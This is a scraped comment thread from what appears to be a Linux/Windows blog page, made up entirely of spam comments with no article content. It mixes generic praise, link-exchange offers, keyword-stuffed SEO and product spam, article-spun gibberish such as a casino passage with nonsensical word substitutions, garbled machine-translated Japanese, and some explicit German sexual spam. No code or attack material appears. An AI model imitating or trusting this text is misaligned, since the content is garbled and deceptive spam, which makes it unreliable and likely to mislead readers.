this side of the story. I was surprised you aren’t more popular because you surely possess the gift.
Howdy! I know this is somewhat off topic but I was wondering if you
knew where I could get a captcha plugin for my comment form?
I’m using the same blog platform as yours and I’m having difficulty finding one?
Thanks a lot!
hello there and thank you for your information – I’ve definitely picked up something new from right here. I did however expertise several technical points using this site, since I experienced to reload the site a lot of times previous to I could get it to load properly. I had been wondering if your web host is OK? Not that I am complaining, but sluggish loading instances times will very frequently affect your placement in google and can damage your high-quality score if ads and marketing with Adwords. Well I am adding this RSS to my email and can look out for a lot more of your respective interesting content. Ensure that you update this again very soon.
Hello! I understand this is sort of off-topic but I had to ask.
Does building a well-established website such
as yours require a large amount of work? I’m completely new to writing a blog but I do write in my diary everyday. I’d like to start a blog so
I can share my experience and views online. Please let me
know if you have any kind of ideas or tips for brand
new aspiring blog owners. Thankyou!
fantastic points altogether, you simply won a new reader.
What could you recommend in regards to your post that you simply made some days in the past?
Any certain?
Thank you a lot for sharing this with all people you really realize what you are talking about!
Bookmarked. Kindly additionally visit my
site =). We can have a link change arrangement between us
I like what you guys tend to be up too. This type of clever work and coverage!
Keep up the amazing works guys I’ve incorporated you guys to blogroll.
What i don’t realize is in reality how you are no longer actually much more well-favored than you might be now. You are very intelligent. You recognize thus considerably in terms of this matter, produced me in my opinion imagine it from a lot of varied angles. Its like men and women aren’t fascinated except it’s one thing to accomplish with Girl gaga! Your own stuffs outstanding. At all times take care of it up!
I just like the helpful information you provide to your articles.
I’ll bookmark your weblog and take a look at once more here regularly. I am quite sure I’ll be told
a lot of new stuff proper here! Best of luck for the following!
Your blog post, “Master File | Linux Windows Blog” was indeed definitely worth commenting here!
Basically wished to point out you actually did a tremendous work.
Thanks for your time -Kermit
I need to to thank you for this wonderful read!
! I definitely enjoyed every little bit of it. I’ve got you book marked to check out new stuff you post…
Hi there! Quick question that’s totally off topic. Do you know how to make your site mobile friendly? My blog looks weird when browsing from my iphone4. I’m
trying to find a theme or plugin that might be able to resolve this problem.
If you have any suggestions, please share. Cheers!
It’s truly very complex in this busy life to listen news on Television, thus I only use world wide web for that reason, and get the newest news.
I don’t write a comment, but I read a few of the comments on this page Master File | Linux Windows Blog. I actually do have a couple of questions for you if it’s
allright. Could it be simply me or do some of the responses
come across like they are written by brain dead folks?
😛 And, if you are writing at additional places, I would like to keep
up with anything fresh you have to post. Would you list of the complete urls of all your shared pages like
your linkedin profile, Facebook page or twitter feed?
Hello there, just became alert to your blog
through Google, and found that it’s really informative. I am gonna watch out for brussels. I will appreciate if you continue this in future. A lot of people will be benefited from your writing. Cheers!
It’s great that you are getting ideas from this paragraph as well as from our dialogue made at this place.
I think the admin of this website is really working hard in support of his web page, since
here every stuff is quality based material.
Wow that was unusual. I just wrote an very long comment but after
I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again.
Regardless, just wanted to say superb blog!
Its like you learn my mind! You appear to understand so much approximately this, such as
you wrote the book in it or something. I believe that you simply can do with some p.
c. to power the message home a bit, however other than that, this is excellent blog.
An excellent read. I will certainly be back.
Thankfulness to my father who told me concerning this weblog, this website is truly remarkable.
An outstanding share! I’ve just forwarded this onto a friend who was conducting a little homework on this. And he in fact bought me dinner because I discovered it for him… lol. So let me reword this…. Thanks for the meal!! But yeah, thanx for spending the time to talk about this issue here on your internet site.
When an individual decides to make the transition from eating meat to being a true vegan, many of the usual
things they once enjoyed go out the window. Net offers two important top toaster oven accessories which are the hanging toaster mound and the rotisserie kit.
The stone is easily cleaned with warm water, scraping
off any pizza remnants with a spatula.
This is the perfect site for everyone who would like to understand
this topic. You realize a whole lot its almost tough to
argue with you (not that I really will need to…HaHa). You definitely put a brand
new spin on a topic that’s been written about for many years. Great stuff, just wonderful!
They can also offer a decorative element to the room.
with your fan, you will want to double check and ensure that
the ball. Manipulating the effects of lighting has since been known as one way of redecorating one’s office and house.
Thanks for another informative site. The place else may I get that type of information written in such a perfect approach?
I’ve a undertaking that I’m just now running on, and I’ve been at the glance out for such information.
It’s going to be end of mine day, but before end I am reading this great post to improve my knowledge.
Having read this I believed it was extremely enlightening.
I appreciate you spending some time and effort to put this short
article together. I once again find myself personally spending a significant amount of time both
reading and commenting. But so what, it was still worth it!
Hello! Do you know if they make any plugins to assist with Search Engine Optimization?
I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains.
If you know of any please share. Cheers!
After I originally left a comment I appear to have clicked on the -Notify me when new
comments are added- checkbox and now every time a comment is added I recieve four emails with the same comment.
Is there an easy method you can remove me from that service?
Cheers!
Excellent way of telling, and nice post to obtain
data about my presentation subject, which i am going to deliver in
academy.
Quality articles is the important to interest the visitors to go
to see the website, that’s what this website is providing.
Hi there, just became alert to your blog through Google, and
found that it is really informative. I am going to watch out for brussels.
I’ll appreciate if you continue this in future. Numerous people will be benefited from your writing. Cheers!
It’s awesome designed for me to have a web page, which is useful in support of my know-how. thanks admin
wonderful publish, very informative. I’m wondering why the other specialists of this sector don’t notice this.
You must proceed your writing. I’m sure, you’ve a great readers’ base already!
Woah! I’m really digging the template/theme of this site. It’s simple,
yet effective. A lot of times it’s very hard to get that “perfect balance” between usability and visual appearance. I must say you’ve done a great job with this.
Additionally, the blog loads extremely fast for me on Opera.
Superb Blog!
Way cool! Some very valid points! I appreciate you writing this post and the rest
of the site is very good.
Hi Dear, are you genuinely visiting this website regularly, if so after that you will absolutely get pleasant knowledge.
Hello! I just would like to give a huge thumbs up for the nice info you’ve right here on this post.
I will probably be coming again to your weblog for extra soon.
I am regular visitor, how are you everybody? This paragraph posted at this website is really nice.
Thanks for ones marvelous posting! I quite enjoyed reading
it, you could be a great author.I will ensure that I bookmark your blog and
definitely will come back down the road. I want to encourage you to ultimately continue your great work, have a nice afternoon!
wherein can i get hold of the image you use on
your website please?
Thanks for your personal marvelous posting!
I genuinely enjoyed reading it, you will be a great author.
I will remember to bookmark your blog and will come back in
the foreseeable future. I want to encourage that you continue your great
work, have a nice day!
My partner and I absolutely love your blog and find a lot of
your post’s to be just what I’m looking for. Would you offer guest writers
to write content for yourself? I wouldn’t mind publishing a post or elaborating on some of the subjects you write about here. Again, awesome web site!
My spouse and I stumbled over here by a different web page and thought I should check things out. I like what I see so now i am following you. Look forward to looking over your web page repeatedly.
Everyone loves what you guys tend to be up too. This type of clever work and reporting! Keep up the terrific works guys I’ve included you guys to blogroll.
Hello I am so happy I found your webpage, I really found
you by error, while I was browsing on Bing for something else,
Nonetheless I am here now and would just like to say thanks for a incredible post and a all round interesting blog (I also
love the theme/design), I don’t have time to browse it all at the moment but I
have book-marked it and also added in your RSS feeds, so when I have
time I will be back to read a great deal more, Please do keep up the awesome work.
Appreciating the persistence you put into your website and detailed information
you present. It’s good to come across a blog every once in a while that isn’t the same out
of date rehashed information. Wonderful read! I’ve saved your site and I’m adding your RSS feeds to my Google account.
Greetings! I’ve been reading your site for a while now and finally got the courage to go ahead and give you a shout out from Lubbock Texas! Just wanted to tell you keep up the fantastic work!
I am really enjoying the theme/design of your blog. Do you ever run into any web browser compatibility issues? A handful of my blog visitors have complained about my site not working correctly in Explorer but looks great in Firefox. Do you have any ideas to help fix this problem?
I’m curious to find out what blog system you have
been using? I’m having some minor security issues with my latest website and I’d
like to find something more risk-free. Do you have any recommendations?
Hmm it seems like your website ate my first comment (it was super
long) so I guess I’ll just sum it up what I had written and say, I’m thoroughly enjoying your blog.
I too am an aspiring blog blogger but I’m still new to the whole thing. Do you have any helpful hints for newbie blog writers? I’d
definitely appreciate it.
Woah! I’m really enjoying the template/theme of this blog. It’s simple, yet effective.
A lot of times it’s hard to get that “perfect balance” between user friendliness and appearance. I must say you’ve
done a awesome job with this. Also, the blog loads super fast for me on Firefox.
Superb Blog!
Do you mind if I quote a couple of your articles as long as I provide credit and sources back to your webpage?
My blog site is in the exact same niche as yours and my users would definitely benefit from a lot of the information you
provide here. Please let me know if this alright with you.
Cheers!
Howdy would you mind letting me know which web host you’re using? I’ve loaded your blog in 3 completely different internet browsers and I must
say this blog loads a lot quicker then most. Can you recommend a good
web hosting provider at a honest price? Cheers, I appreciate it!
Excellent site you have here but I was wondering
if you knew of any message boards that cover the same topics talked about in this article?
I’d really love to be a part of group where I can get opinions from other experienced individuals that share the same interest. If you have any suggestions, please let me know. Appreciate it!
Hello there! This is my 1st comment here so I just wanted to give a quick shout out and tell you I really enjoy reading your posts. Can you recommend any other blogs/websites/forums that cover the same subjects? Thanks for your time!
Do you have a spam problem on this website; I also am a blogger, and I was wondering your situation; many of us have created some nice procedures and we are looking to swap methods with others, be sure to shoot me an e-mail if interested.
Please let me know if you’re looking for a article writer for your
blog. You have some really good articles and I feel I would be a good asset.
If you ever want to take some of the load off, I’d love to write some content for your blog in exchange for a link back to mine. Please shoot me an e-mail if interested. Many thanks!
Have you ever thought about adding a little bit more than just your articles? I mean, what you say is important and all. Nevertheless think about if you added some great images or video clips to give your posts more, “pop”! Your content is excellent but with pics and video clips, this site could certainly be one of the very best in its field. Wonderful blog!
Nice blog! Is your theme custom made or did you download it from somewhere? A theme like yours with a few simple adjustements would really make my blog jump out. Please let me know where you got your theme. Many thanks
Hi would you mind stating which blog platform you’re working with?
I’m looking to start my own blog soon but I’m having a difficult
time deciding between BlogEngine/Wordpress/B2evolution and Drupal.
The reason I ask is because your layout seems different then most blogs and I’m looking for something completely unique. P.S My apologies for being off-topic but I had to ask!
Hi there just wanted to give you a quick heads up. The text in your article seem to be running off the screen in Chrome. I’m not sure if this
is a format issue or something to do with browser compatibility but I
figured I’d post to let you know. The layout look great though! Hope you get the issue fixed soon. Thanks
With havin so much content do you ever run into any issues of plagorism or copyright infringement? My blog has a lot of unique content I’ve either created myself or outsourced but
it looks like a lot of it is popping it up all over the
web without my authorization. Do you know any solutions to
help reduce content from being ripped off? I’d definitely appreciate it.
Have you ever thought about creating an e-book or guest authoring on other websites? I have a blog centered on the same information you discuss and would love to have you share some stories/information. I know my subscribers would value your work. If you are even remotely interested, feel free to shoot me an e-mail.
Hey! Someone in my Facebook group shared this website with us so I came to take a look. I’m definitely enjoying the information.
I’m bookmarking and will be tweeting this to my followers! Exceptional blog and amazing design.
Excellent blog! Do you have any tips for aspiring writers? I’m planning
to start my own site soon but I’m a little lost on everything. Would you suggest starting with a free platform like WordPress or go for a paid option? There are so many choices out there that I’m
completely overwhelmed .. Any tips? Thanks!
My programmer is trying to persuade me to move to .net from PHP.
I have always disliked the idea because of the expenses.
But he’s tryiong none the less. I’ve been using WordPress on numerous websites
for about a year and am nervous about switching to another platform.
I have heard good things about blogengine.net. Is there a way I can transfer all my
wordpress content into it? Any kind of help would be greatly
appreciated!
Does your blog have a contact page? I’m having trouble locating it but, I’d like to send you an e-mail.
I’ve got some ideas for your blog you might be interested in hearing. Either way, great site and I look forward to seeing it expand over time.
It’s a pity you don’t have a donate button! I’d most certainly donate to this fantastic blog!
I suppose for now i’ll settle for bookmarking and adding your RSS feed to my Google account. I look forward to fresh updates and will share this blog with my Facebook group. Chat soon!
Greetings from Ohio! I’m bored to tears at work
so I decided to check out your blog on my iphone during lunch break.
I love the knowledge you present here and can’t wait to take a look when I get home. I’m shocked at how
quick your blog loaded on my phone .. I’m not even using WIFI, just 3G .. Anyways, excellent site!
Hello! I know this is kinda off topic however I’d
figured I’d ask. Would you be interested in exchanging links or maybe guest writing a blog post or vice-versa? My site addresses a lot of the same topics as yours and I think we could greatly benefit from each other. If you might be interested feel free to send me an email. I look forward to hearing from you! Wonderful blog by the way!
At this time it looks like BlogEngine is the preferred blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?
Exceptional post however I was wanting to know if you could write a litte more on this topic? I’d
be very thankful if you could elaborate a little bit more.
Kudos!
Hey! I know this is somewhat off topic but I was wondering if you
knew where I could get a captcha plugin for my comment form?
I’m using the same blog platform as yours and I’m having
trouble finding one? Thanks a lot!
When I originally commented I clicked the “Notify me when new comments are added” checkbox and now each time a comment is
added I get four emails with the same comment.
Is there any way you can remove me from that service?
Thanks a lot!
Hi there! This is my first visit to your blog! We are a collection of
volunteers and starting a new initiative in a community in the same niche.
Your blog provided us valuable information to work on.
You have done a marvellous job!
Good day! I know this is somewhat off topic but I
was wondering which blog platform are you using
for this website? I’m getting tired of WordPress because I’ve had issues with hackers and I’m looking at alternatives for another platform. I would be great if you could point me in the direction of a good platform.
Hi! This post couldn’t be written any better! Reading through this post reminds me
of my good old room mate! He always kept talking about this.
I will forward this page to him. Pretty sure he will
have a good read. Many thanks for sharing!
Write more, thats all I have to say. Literally,
it seems as though you relied on the video to make
your point. You definitely know what youre talking about, why waste your intelligence on just posting
videos to your blog when you could be giving us something enlightening to read?
Today, I went to the beachfront with my children. I found a
sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She placed the shell to her ear and screamed.
There was a hermit crab inside and it pinched her ear.
She never wants to go back! LoL I know this is completely off topic but I
had to tell someone!
Yesterday, while I was at work, my sister stole my iphone and tested to see if it can survive a thirty foot
drop, just so she can be a youtube sensation.
My apple ipad is now broken and she has 83 views.
I know this is totally off topic but I had to share it
with someone!
I was curious if you ever considered changing the structure of your site?
Its very well written; I love what youve got to say. But
maybe you could a little more in the way of content so people could connect with it better.
Youve got an awful lot of text for only having one or 2 pictures.
Maybe you could space it out better?
Howdy, i read your blog from time to time and i own a similar one and i was just wondering if you get a lot of spam feedback?
If so how do you protect against it, any plugin or anything you
can advise? I get so much lately it’s driving me mad so any help is very much appreciated.
This design is incredible! You most certainly know how to keep a reader entertained. Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Excellent job. I really loved what you had to say, and more than that, how you presented it. Too cool!
I’m truly enjoying the design and layout of your website.
It’s a very easy on the eyes which makes it much more pleasant for me to come here and visit more often. Did you hire out a designer to create your theme? Outstanding work!
Good day! I could have sworn I’ve been to this blog before but after browsing through some of the post I realized it’s new to me. Nonetheless, I’m definitely glad I found it
and I’ll be bookmarking and checking back often!
Hey! Would you mind if I share your blog with my zynga group? There’s a lot of folks
that I think would really appreciate your content. Please let me know.
Thanks
Hello, I think your blog might be having browser compatibility
issues. When I look at your blog in Firefox, it looks fine but when opening
in Internet Explorer, it has some overlapping. I just wanted to give you a
quick heads up! Other then that, awesome blog!
Sweet blog! I found it while browsing on Yahoo News. Do you
have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Thanks
Hi! This is kind of off topic but I need some guidance from an established blog. Is it tough to set up your own blog? I’m not very
techincal but I can figure things out pretty fast. I’m thinking about creating my own but I’m not sure where
to start. Do you have any points or suggestions? Appreciate
it
Hey there! Quick question that’s totally off topic. Do you know how to make your site mobile friendly? My web site looks weird when browsing from my apple iphone. I’m trying to find a theme
or plugin that might be able to correct this issue. If you have any suggestions, please
share. With thanks!
I’m not that much of a online reader to be honest but your blogs really nice, keep
it up! I’ll go ahead and bookmark your website to come back later on. All the best
I really like your blog.. very nice colors & theme. Did you create this website yourself or did you hire someone to do it for you? Plz reply as I’m looking
to create my own blog and would like to know where u got this
from. thank you
Whoa! This blog looks just like my old one!
It’s on a totally different topic but it has pretty much the same layout and design. Outstanding choice of colors!
Hey just wanted to give you a quick heads up and let you know a few of the images aren’t loading correctly.
I’m not sure why but I think its a linking issue. I’ve tried it
in two different browsers and both show the same outcome.
Hey there are using WordPress for your blog platform?
I’m new to the blog world but I’m trying to get started and set up my own.
Do you need any html coding knowledge to make your own
blog? Any help would be greatly appreciated!
Whats up this is kinda of off topic but I was wanting to know if blogs use WYSIWYG editors or if
you have to manually code with HTML. I’m starting a blog soon but have no coding knowledge so I wanted to get advice from someone with experience. Any help would be greatly appreciated!
Hey! I just wanted to ask if you ever have any trouble with hackers? My last blog (wordpress) was hacked and I ended up losing months of hard work due to no back up. Do you have any solutions to protect against hackers?
Hi there! Do you use Twitter? I’d like to follow you if
that would be ok. I’m definitely enjoying your blog and look forward to new updates.
Hi there! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any suggestions?
Hello! Do you know if they make any plugins to assist with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results. If you know of any please share. Cheers!
I know this if off topic but I’m looking into starting my own blog and was curious what all is
needed to get set up? I’m assuming having a blog like yours would cost a pretty penny? I’m
not very internet smart so I’m not 100% sure. Any suggestions or advice would be greatly appreciated. Cheers
Hmm is anyone else experiencing problems with the images on this blog loading? I’m trying to figure out if its
a problem on my end or if it’s the blog. Any feedback would be greatly appreciated.
I’m not sure exactly why but this blog is loading very slow for me.
Is anyone else having this issue or is it a issue on my end?
I’ll check back later on and see if the problem still exists.
Hi there! I’m at work surfing around your blog from my new iphone!
Just wanted to say I love reading your blog and
look forward to all your posts! Carry on the excellent work!
Wow that was unusual. I just wrote an incredibly long
comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m
not writing all that over again. Regardless, just wanted to say excellent
blog!
Carrying an especially shade and another pair of view glasses is also noticed.
This short article could supply some of the information that you just
have to learn. Now this bag, as a full-blown rose,
is flowering in the fashion stage. You can pick to have concerned
with some thing alluring. http://www.apollohotel.
com.br/userinfo.php?uid=9576
It looks just like like wonderful created, nevertheless it just an
individual area of your honor. Great examining anyway,
We often appreciated very good head teaser and solid amount of nice facts.
Jojoba oil is proper for all skin types and it can penetrate the skin
to moisturize, nourish, and soften your dry skin.
This means that, you can use almond oil to massage your body whether you have
normal, dry or oily skin. Sometimes these patches tend to get itchy, and of
course there’s the temptation to scratch, but this only makes the problem worse and increases the chance of infection.
I simply couldn’t leave your web site before suggesting that I extremely enjoyed the usual info an individual supply on your guests? Is going to be again steadily in order to check up on new posts
I – 靴は私にまっすぐに配信
100以上の小売店と50,
000のペアで、また、
ショッピングカテゴリ
内の別の明確な勝者
である – 電話、検索
オプション、
ウィッシュリス
トやFacebookオプションにポスト靴
愛好家は合計楽園になります
Hello! I could have sworn I’ve been to this blog before but after going through many of the articles I realized it’s new to
me. Nonetheless, I’m certainly pleased I came across it and I’ll be bookmarking it and checking back often!
Awesome! Its truly awesome article, I have got much clear idea about from this
piece of writing.
When I initially commented I clicked the “Notify me when new comments are added” checkbox and now each time a comment is added I get three e-mails with the same comment.
Is there any way you can remove me from that service?
Thank you!
This search engine optimisation url building some text of
suggestions may perhaps assistance raise your search term relevancy.
The knowledge and also the qualities of the Look for engine optimization Service
provider also will go a long way to make the last conclusion.
Its like you read my mind! You seem to know a lot about this, like
you wrote the book in it or something. I think that you can do with some pics to drive the message home a bit, but
instead of that, this is great blog. A great read. I’ll definitely be back.
Hi, I think your blog might be having browser compatibility issues.
When I look at your blog site in Firefox, it looks fine
but when opening in Internet Explorer, it has some overlapping.
I just wanted to give you a quick heads
up! Other then that, amazing blog!
Hey there! This is my first visit to your blog! We are a group
of volunteers and starting a new project in a community in
the same niche. Your blog provided us valuable information to work on.
You have done a marvellous job!
I’m impressed, I must say. Seldom do I come across a blog that’s both equally
educative and amusing, and let me tell you, you’ve hit the nail on the head. The issue is something not enough men and women are speaking intelligently about. I am very happy I found this in my hunt for something regarding this.
Right away I am ready to do my breakfast, afterward having my breakfast
coming over again to read more news.
Never Choose Supplies Solely Based concerned with Emails or Newssheets – You want
to never make dollar stock picks based on email advice or an unsolicited ad.
Secondly, this is ordinarily simply not to obtain
any individual who just wants time for trade penny investments.
Hi there friends, how is the whole thing, and what you would like to say regarding
this post, in my view its actually amazing in support of me.
Hello, its fastidious post concerning media print, we all be familiar
with media is a fantastic source of data.
The samsung galaxy Indulge is the second
ever Sprint phone to take advantage of its large screen.
The image, which the iPad can’t. Here today we’re looking at you, and viewing angles are just
about average. The American model touts a slightly curvier frame, however.
Nice blog! Is your theme custom made or did you download it from somewhere?
A design like yours with a few simple adjustements would really
make my blog jump out. Please let me know where you got
your theme. Many thanks
It comes and goes, but each time the voice gets a little louder and
a little more urgent. Calisthenics are generally safe but certain bodyweight workouts may be not be
appropriate for individuals who have cardiac or lung problems.
I invite you to get Instant Access to My Free No-Brainer Food Guide when you
visit Nelsongy Fitness.
Way cool! Some extremely valid points! I appreciate you writing this
write-up and the rest of the site is also really good.
Everything is very open with a really clear clarification of the challenges.
It was truly informative. Your site is very useful.
Thanks for sharing!
It used to be that the Philippines’ biggest competitive advantage in the global job market is the proficiency of our skilled workers in the English language. The well illustrated presentation brings to the fore the popularity and acceptance of English as the working language in India. Get translations free and learn to speak German from your Android with no stress.
You would find the USB port at the back of a desktop computer or on the side of
a laptop. For the bidet example, you may want a short introduction about bidets, leading into their various
health benefits and concluding with an emphatic
argument about how they may improve one. If you are looking for specialized
supplies for a specific dog breed, these may be harder to come by.
You are so interesting! I do not suppose I’ve truly read anything like this before. So good to discover someone with genuine thoughts on this subject matter. Seriously.. many thanks for starting this up. This site is something that is needed on the web, someone with a little originality!
The six-pack abs workouts are designed to give you an outstanding exercise in your stomach area.
This Tao of Badass Overview will show you a glimpse
on his guidance in possessing a conversation with a person
you’re attracted to.
It’s actually a great and useful piece of info. I’m satisfied that you just shared this useful info with
us. Please stay us informed like this. Thank you for sharing.
Genus Circus Circus Hotel & Casinos — opens Celestial Latitude. Atomic Number 7 Civic de Tepatitl? Northward de autorizaci northward, atraso tecnol? Atomic Number 33 common, the governor said that encouraging Euro Vegas is silent clear geezerhood out. The proprietor of Resorts Casinos Hotel. Atomic Number 16 bajos proyectados paratrooper los vecinos de la izquierda para coger lah de lanthanum segunda expansi? Third, the Florida Supreme Court in Camden. I atomic number 95 deoxyadenosine monophosphate twenty-one game weather condition resources known as the City luncheon appears intimately on angstrom beach. online casinos The direction undertake for their meal could not fire hook commentary on pending litigation. The topper constituent is that they can buoy course down the route face from rainfall aggregation inch the Joined States, this year’s variation was overpoweringly approved past angstrom recollective clip agone. Testing things extinct with $Seventeen. Here are some restrictions.
Hello friends, how is all, and what you wish for to say on the topic of this piece of writing, in my view its genuinely amazing in favor of me.
It’s good to get some inspiration from these 15 spring 2013 wedding dresses — including one red-hot Vera Wang dress. The West Michigan woman put on the black dress she planned to wear for her civil wedding and wrapped up the cloth out of which her church Wedding Dress was to be tailored. She also confirmed to be pregnant and said that she and her fiance spent on a brand-new gown. If you are planning a summer wedding. Moreover, every one of these sales may be taking place. Susan takes home Top Prize and $2012.
Everything is very open with a very clear clarification of the challenges.
It was truly informative. Your website is useful.
Thank you for sharing!
Hi there, I enjoy reading through your article. I like to write a little comment
to support you.
Your style is really unique in comparison to other people I
have read stuff from. Many thanks for posting when you have the opportunity,
Guess I will just bookmark this page.
As a result, when searching for vendors the best ones are likely those that provide averages but make no guarantees.
Here are a number of steps in the manual accounting cycle that will be automated by a reliable accounting software program such as Quick – Books:.
In the latest version of Quicken provides to advance benefits make it the bookkeeping accounting software preferred among
bookkeeper and accountants.
Really no matter if someone doesn’t be aware of after that its up to other people that they will help, so here it occurs.
I appreciate perusing your site. thnx!
Great looking internet site. Assume you did a bunch of your very own html coding.
Thanks extremely valuable. Will certainly share site with my friends.
I delight in the info on your website. Thank you.
Thanks a lot! This is an great website!
Great website! It looks really professional!
Sustain the great job!
整然とした 流出右 ‘”右 に、 心コンテンツ: 普段 ドリル ダウン またはちょうど、 肉の詳細 流出 は も 真実、 職業 の各 人の ストレート染色 に、 グリーン エリア 区域敷物 s 。枯渇する必要があります と呼ばれる をブロック それはまた あなたが提供する による、 苦労 を持っている、 で撮影 リンバーを を通じて、アップル サイダーの酢 ずっと前に を提供します。 製品に 吸う 。ハーディのいくつかの並べ替え 洗浄剤 だろう実際に人の変色 ジムの床の および敷物 という のように 魅力 。
Many thanks really practical. Will share site with my friends.
Your material is very helpful.
Your posts is quite interesting.
I appreciate reading your websites. Thanks!
Sie war wie umgedreht und kletterte über diesen Tresen geradewegs in unsere Arme.
Heiße ölspiele, oder mal zu sehen wie sich eine Frau selber streichelt alles alles darf man hier sehen und geniessen. Danach stand sie auf und ich tastete ihren Busen ab.
Great looking internet site. Think you did a whole lot of your very own coding.
Especially interesting….look frontward to coming back again.
Pretty revealing….look forward to coming back again.
Sie war wie umgedreht und kletterte über den Tresen geradewegs in meine Arme.
Möchtest du lieber dieser dominante oder dieser devote Part sein. Alles ist einfach berauschend, wenn du siehst, wie ein enges Votzenloch gedehnt wird.
It is easily operated because the activating switch of the camera lies depressed down in the body.
Whatever the exact historical context for John’s concerns regarding persecution, he wrote to provide his readers with a different way of viewing their situation. 0 MP has many features that make this camera a great buy.
Miami mustang car rental
Fantastic website you have there.
I love perusing your internet site. Thanks!
This article will help the internet users for creating new weblog or even a weblog from start
to end.
Soya Beans: Soya Beans are the highest source of protein among vegetarian foods.
From here it is responsible for giving us the message that we are full and so helps us to stop overeating. Other things to eat to lose weight fast include foods that are high in fiber.
Thanks, this site is very beneficial.
How goes it, nice online site you’ve at this time there.
But the first two quarters. GenuineCheap Oakley Sunglasses shades reproduction tend to be,” said Jim Frazier, Erik Nunn’s friend. Oakley Fives 2 0 Sunglasses Grabbing attention was never easy andcheap oakley sunglasses sunglasses help you do just that. Hace tiempo, una amiga, decidi clasificar como literatura basura todo lo que ha dado la Secretaria de Estado Hillary Rodham Clinton D-N.
Many thanks really practical. Will certainly share website with my pals.
You’ve gotten good information in this article.
He says, Look at this filthy motor oil. If you do have a small place in the automotive or franchising
world, said Rissy Sutherland, COO of Honest-1 Auto Mechanic 60622.
The oil change attendant would show the reporter the dirty oil, and entrusted my car
to him for minor repairs. When we do things ourself, it takes a
lot of sense. However it is not advised to
use a refrigerant that is not ozone friendly. Megayachts can be flagged and classified for unlimited service.
say thanks to so much for your internet site it assists a great deal.
At 470 grams, it’s fairly light, and its basic automatic and manual controls are well placed. And its integrated mic makes use of Wind Noise Canceler that identifies and suppresses the wind noise. So, unless video recording capabilities is an issue for you, I don’t think you should just go out and spend another $400 on a brand new camera if you already have either the SX10IS or the FZ28.
I appreciate the knowledge on your web site. Thanks a ton.
Many shops charge for diagnostic time or to partially disassemble a car component such as an engine or transmission in order to successfully make it through Pool Service Gilbert Az Training are as follows.
There are many people who would consider going to pool service gilbert az schools to get formal training and get a job in the industry. So, look for the perfect mix of quality and affordability when buying CTS floor mats.
Once downloaded, just click convert all files now and select your output, or if you know you want all output to be the same, then select preset output.
Of course all of this is a drop in the ocean when we factor in the new Kindle Fire, a $200 7 inch tablet running a customized version of Android 3. This loss may become an opportunity for Android-run devices which is expected to improve its market share in years to come.
Great looking site. Think you did a lot of your very own coding.
Keep up the remarkable job !! Lovin’ it!
Sustain the exceptional job !! Lovin’ it!
Thanks regarding offering these kinds of wonderful subject material.
Discover one key weight loss secret of switching out bad fats for good fats, such as those found in coconut oil and products.
Capric Acid: This is yet another triglyceride present in Coconut Oil is one of the most nutritionally rich coconuts in the world! With its healthy properties, excellent taste and beautiful aroma, unrefined coconut oil from nutiva is the perfect solution. Virgin Coconut Oil: The Delicious Fat Burner Not all of fats are harmful for health, but it is not for veagns.
So let’s expression at the unlike characters of of latest patterns to ware warranty to time management to coevals of new Business Plan Consultant should be led caution of efficaciously.
So, all parents can now rest assured that their children will not only make their career, but also serve the country.
Additionally you could need to get extended education credits or education to steadfastly keep up your certification as time continues on. This job is very good for caring, hands-on people who wish to be helping people each and every day of these lives and careers.
Hi it’s me, I am also visiting this web site on a regular basis, this web site is truly nice and the users are really sharing fastidious thoughts.
You have very well knowlwdge on this web-site.
Great website! It looks very professional! Maintain the helpful work!
Truly interesting….look onward to coming back.
You have got wonderful knowlwdge these.
Thanks a lot for sharing your neat site.
Thank you so much for sharing this superb web page.
Highly enlightening, look frontward to coming back again.
thank so a lot for your site it assists a great deal.
Thanks for the purpose of furnishing these fantastic knowledge.
Thanks really useful. Will share site with my buddies.
Thanks for the purpose of providing these kinds of awesome written content.
Next thing, he’s already graduation in high field of study.
If you find your letter is now also your Rsvp to the reception invitation, then the actual response should prove included in ones own letter of how exciting.
http://www.orthotics-online.co.uk/store/index.php?cPath=1
that awesome I say good website!!! thanks goodbye.
hello thnak you for letitng me post here. Please go now my website toijhbrwhtqrwh! Hello cheers.
that must seem really cool aaaaaaaaaaaaah great I wouldnt have guess that for sure!
540e93tj54w6t5rbw6tyr5jnhw 5rwjnhpmzesh5rtwzsh 6twh that is really so cool thank you for psoting it now ah that is mega cool that is so brillaint i understand now!!!!!!!! how really extra awesome. seo sheffield seo web design sheffield sheffield seo webdesign.
Hi, I would like to subscribe ffor this website tto take most recent updates, so where ccan i ddo itt
please assist.
Right here is the right webpage for everyone who really wants to
understand this topic. You realize a whole lot its almost tough to argue with you (not that I personally would want to…HaHa).
You certainly put a brand new spin on a topic that has
been written about for many years. Excellent stuff, just excellent!
addicting games weebly playstation 4 unboxing playstation games insoles insoles sports arch support plantar fasciitis insoles sports running insoles playstation magazine disney channel games kim possible playstation 4 review insoles insoles sports arch support plantar fasciitis insoles sports running insoles armor games hacked cool games games online addicting games 10 insoles insoles sports arch support plantar fasciitis insoles sports running insoles playstation mobile disney channel games 2008 disney channel games 2006 insoles insoles sports arch support plantar fasciitis insoles sports running insoles yahoo games dr scholls insoles size 15 dress up games monster high insoles insoles sports arch support plantar fasciitis insoles sports running insoles playstation move insoles for high heels playstation 3 console insoles insoles sports arch support plantar fasciitis insoles sports running insoles free online games for adults xbox 360 kinect gamestop.com insoles insoles sports arch support plantar fasciitis insoles sports running insoles board games for 2 year olds disney channel games mickey mouse cartoon network games batman insoles insoles sports arch support plantar fasciitis insoles sports running insoles armor games playstation network down cartoon network games lego insoles insoles sports arch support plantar fasciitis insoles sports running insoles armor games kingdom rush playstation 3 games xbox 360 arcade insoles insoles sports arch support plantar fasciitis insoles sports running insoles dress up games boys cool math games bloxorz playstation.com insoles insoles sports arch support plantar fasciitis insoles sports running insoles playstation 2 nintendo ds games cool math games parking mania insoles insoles sports arch support plantar fasciitis insoles sports running insoles cool math games bloxorz insoles for birkenstock shoes playstation 4 gameplay insoles insoles sports arch support plantar fasciitis 